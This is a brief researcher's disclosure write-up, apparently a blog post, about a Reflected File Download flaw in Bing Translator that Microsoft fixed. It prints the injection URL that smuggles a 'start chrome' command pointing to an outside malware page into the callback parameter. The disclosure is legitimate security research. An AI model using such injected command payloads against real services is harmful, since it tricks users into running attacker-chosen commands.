When using Bing online translator I noticed a XHR request on my browser that caught my attention:
http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=jQuery111207287312552798539_1444907172498&market=en&word=test&_=1444907172499
On which reflected on the screen:
jQuery111207287312552798539_1444907172498();
As a security researcher I always try to find different ways to bypass security specially related to Reflected File Download. So I tried to inject a RFD vector on the parameter “oncomplete”:
http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm
On which reflected on the screen:
start chrome davidsopas.com/poc/malware.htm();
Using the HTML5 download attribute I was able to send a security report to Microsoft which they fixed within a month.
With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the forth time.